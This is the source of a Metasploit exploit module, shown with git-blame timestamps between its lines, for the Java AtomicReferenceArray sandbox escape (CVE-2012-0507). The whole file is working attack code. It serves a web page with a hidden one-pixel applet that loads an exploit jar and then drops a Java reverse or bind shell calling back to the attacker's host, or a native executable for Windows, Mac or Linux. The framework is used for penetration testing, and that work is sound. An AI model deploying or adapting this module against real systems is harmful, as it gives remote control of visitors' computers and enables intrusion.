2012-03-29 10:31:14 -05:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-03-29 10:31:14 -05:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2012-03-29 10:31:14 -05:00
|
|
|
Rank = ExcellentRanking
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
|
include Msf::Exploit::EXE
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-30 12:59:07 -06:00
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
|
autopwn_info({ :javascript => false })
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability',
|
|
|
|
|
'Description' => %q{
|
2012-03-29 10:31:14 -05:00
|
|
|
This module exploits a vulnerability due to the fact that
|
2025-06-20 13:20:44 +01:00
|
|
|
AtomicReferenceArray uses the Unsafe class to store a reference in an
|
|
|
|
|
array directly, which may violate type safety if not used properly.
|
|
|
|
|
This allows a way to escape the JRE sandbox, and load additional classes
|
|
|
|
|
in order to perform malicious operations.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => [
|
|
|
|
|
'Jeroen Frijters', # Initial discovery according to his blog
|
2012-03-31 03:01:09 -05:00
|
|
|
'sinn3r', # metasploit module
|
|
|
|
|
'juan vazquez', # metasploit module
|
|
|
|
|
'egypt' # added support for older java versions
|
2012-03-29 10:31:14 -05:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'References' => [
|
2012-03-29 10:31:14 -05:00
|
|
|
['CVE', '2012-0507'],
|
2016-07-15 12:00:31 -05:00
|
|
|
['OSVDB', '80724'],
|
2012-03-29 10:31:14 -05:00
|
|
|
['BID', '52161'],
|
|
|
|
|
['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
|
|
|
|
|
['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
|
2012-04-01 01:30:50 -05:00
|
|
|
['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],
|
2012-09-03 15:57:27 -05:00
|
|
|
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'],
|
2022-01-23 15:28:32 -05:00
|
|
|
['URL', 'https://www.rapid7.com/blog/post/2012/03/29/cve-2012-0507--java-strikes-again']
|
2012-03-29 10:31:14 -05:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'Platform' => %w{java linux osx solaris win},
|
|
|
|
|
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
|
|
|
|
'Targets' => [
|
|
|
|
|
[
|
|
|
|
|
'Generic (Java Payload)',
|
2012-03-29 10:31:14 -05:00
|
|
|
{
|
|
|
|
|
'Platform' => ['java'],
|
|
|
|
|
'Arch' => ARCH_JAVA,
|
|
|
|
|
}
|
|
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
[
|
|
|
|
|
'Windows x86 (Native Payload)',
|
2012-03-29 10:31:14 -05:00
|
|
|
{
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
}
|
|
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
[
|
|
|
|
|
'Mac OS X PPC (Native Payload)',
|
2012-03-29 10:31:14 -05:00
|
|
|
{
|
|
|
|
|
'Platform' => 'osx',
|
|
|
|
|
'Arch' => ARCH_PPC,
|
|
|
|
|
}
|
|
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
[
|
|
|
|
|
'Mac OS X x86 (Native Payload)',
|
2012-03-29 10:31:14 -05:00
|
|
|
{
|
|
|
|
|
'Platform' => 'osx',
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
}
|
|
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
[
|
|
|
|
|
'Linux x86 (Native Payload)',
|
2012-03-29 10:31:14 -05:00
|
|
|
{
|
|
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'DefaultTarget' => 0,
|
2025-06-23 12:00:29 +01:00
|
|
|
'DisclosureDate' => '2012-02-14',
|
|
|
|
|
'Notes' => {
|
2025-06-23 12:43:46 +01:00
|
|
|
'Reliability' => UNKNOWN_RELIABILITY,
|
|
|
|
|
'Stability' => UNKNOWN_STABILITY,
|
|
|
|
|
'SideEffects' => UNKNOWN_SIDE_EFFECTS
|
2025-06-23 12:00:29 +01:00
|
|
|
}
|
2025-06-20 13:20:44 +01:00
|
|
|
)
|
|
|
|
|
)
|
2012-03-29 10:31:14 -05:00
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
def exploit
|
|
|
|
|
# load the static jar file
|
2025-06-20 13:20:44 +01:00
|
|
|
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2012-0507.jar")
|
|
|
|
|
fd = File.open(path, "rb")
|
2012-03-29 10:31:14 -05:00
|
|
|
@jar_data = fd.read(fd.stat.size)
|
|
|
|
|
fd.close
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
super
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
def on_request_uri(cli, request)
|
2012-03-30 02:06:56 -05:00
|
|
|
data = ""
|
|
|
|
|
host = ""
|
|
|
|
|
port = ""
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
if not request.uri.match(/\.jar$/i)
|
|
|
|
|
if not request.uri.match(/\/$/)
|
2025-06-20 13:20:44 +01:00
|
|
|
send_redirect(cli, get_resource() + '/', '')
|
2012-03-29 10:31:14 -05:00
|
|
|
return
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-04-20 13:31:42 -06:00
|
|
|
print_status("Sending #{self.name}")
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
payload = regenerate_payload(cli)
|
2012-03-29 10:31:14 -05:00
|
|
|
if not payload
|
2025-06-20 13:20:44 +01:00
|
|
|
print_error("Failed to generate the payload.")
|
2012-03-29 10:31:14 -05:00
|
|
|
return
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
if target.name == 'Generic (Java Payload)'
|
|
|
|
|
if datastore['LHOST']
|
2025-06-20 13:20:44 +01:00
|
|
|
jar = payload.encoded
|
2012-03-29 10:31:14 -05:00
|
|
|
host = datastore['LHOST']
|
|
|
|
|
port = datastore['LPORT']
|
2012-04-25 15:01:50 -05:00
|
|
|
vprint_status("Sending java reverse shell")
|
2012-03-29 10:31:14 -05:00
|
|
|
else
|
|
|
|
|
port = datastore['LPORT']
|
2014-04-14 22:17:31 -05:00
|
|
|
host = cli.peerhost
|
2025-06-20 13:20:44 +01:00
|
|
|
vprint_status("Java bind shell")
|
2012-03-29 10:31:14 -05:00
|
|
|
end
|
|
|
|
|
if jar
|
2025-06-20 13:20:44 +01:00
|
|
|
print_status("Generated jar to drop (#{jar.length} bytes).")
|
|
|
|
|
jar = Rex::Text.to_hex(jar, prefix = "")
|
2012-03-29 10:31:14 -05:00
|
|
|
else
|
2025-06-20 13:20:44 +01:00
|
|
|
print_error("Failed to generate the executable.")
|
2012-03-29 10:31:14 -05:00
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
else
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
# NOTE: The EXE mixin automagically handles detection of arch/platform
|
|
|
|
|
data = generate_payload_exe
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
print_status("Generated executable to drop (#{data.length} bytes).")
|
|
|
|
|
data = Rex::Text.to_hex(data, prefix = "")
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
send_response_html(cli, generate_html(data, jar, host, port), { 'Content-Type' => 'text/html' })
|
2012-03-29 10:31:14 -05:00
|
|
|
return
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-04-20 13:31:42 -06:00
|
|
|
print_status("Sending jar")
|
2025-06-20 13:20:44 +01:00
|
|
|
send_response(cli, generate_jar(), { 'Content-Type' => "application/octet-stream" })
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
handler(cli)
|
2012-03-29 10:31:14 -05:00
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
def generate_html(data, jar, host, port)
|
|
|
|
|
jar_name = rand_text_alpha(rand(6) + 3) + ".jar"
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
html = "<html><head></head>"
|
2012-03-29 10:31:14 -05:00
|
|
|
html += "<body>"
|
2012-03-30 02:06:56 -05:00
|
|
|
html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
|
2012-03-29 10:31:14 -05:00
|
|
|
html += "<param name=\"data\" value=\"#{data}\"/>" if data
|
|
|
|
|
html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
|
|
|
|
|
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
|
|
|
|
|
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
|
|
|
|
|
html += "</applet></body></html>"
|
|
|
|
|
return html
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-03-29 10:31:14 -05:00
|
|
|
def generate_jar()
|
|
|
|
|
return @jar_data
|
|
|
|
|
end
|
|
|
|
|
end
|